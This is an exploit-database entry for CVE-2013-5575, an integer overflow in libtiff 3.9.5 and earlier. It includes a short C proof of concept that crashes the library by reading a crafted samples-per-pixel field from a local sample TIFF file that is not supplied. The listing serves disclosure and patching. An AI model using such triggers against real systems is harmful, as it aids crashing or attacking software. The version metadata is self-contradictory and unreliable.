libtiff - exploit.company

vendor:

libtiff

by:

x90c

7,5

CVSS

HIGH

Integer overflow

190

CWE

Product Name: libtiff

Affected Version From: 3.9.5

Affected Version To: 3.6.0

Patch Exists: YES

Related CWE: CVE-2013-5575

CPE: a:libtiff:libtiff

Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2013-0873/, https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2013-0874/, https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2013-0834/, https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2013-0839/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2013

libtiff <= 3.9.5 Integer overflow bug poc

A proof-of-concept code for an integer overflow vulnerability in libtiff versions 3.9.5 and below. The vulnerability is triggered when the TIFFGetField library function is called with a malicious samplesperpixel field value, resulting in a segmentation fault.

Mitigation:

Upgrade to a version of libtiff that is not vulnerable to this issue.

Source

Exploit-DB raw data:

/*
# Exploit Title: libtiff <= 3.9.5 Integer overflow bug poc
# Date: 2013/08/25
# Exploit Author: x90c
# Vendor Homepage: http://www.remotesensing.org/libtiff
# Version:
- libtiff 3.9.5 <=
# Tested on:
- libtiff 4.0.3
- libtiff 4.0.2
- libtiff 4.0.1
- libtiff 4.0.0 (safe)
- libtiff 3.9.5 (vulnerable) <=
- libtiff 3.6.0
# CVE : CVE-2013-5575

I submit the poc of libtiff bug and
attached original advisory too
I want to submit the poc, sample file only

http://www.x90c.org/advisories/xadv_2013001_libtiff.txt
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "tiffio.h"

int tiff_integer_overflow_test(){
TIFF* tif = TIFFOpen("/home/x90c/sample_spp.tif", "r");
int samples = 0;

/*
 * for instance, TIFFGetField library function will
 * called with malicious samplesperpixel field value 
 * TIFFGetField got segfault!
 */
TIFFGetField(tif, TIFFTAG_SAMPLESPERPIXEL, &samples);

printf("tiff_poc: tif samplesperpixel field=%d\n", samples);
}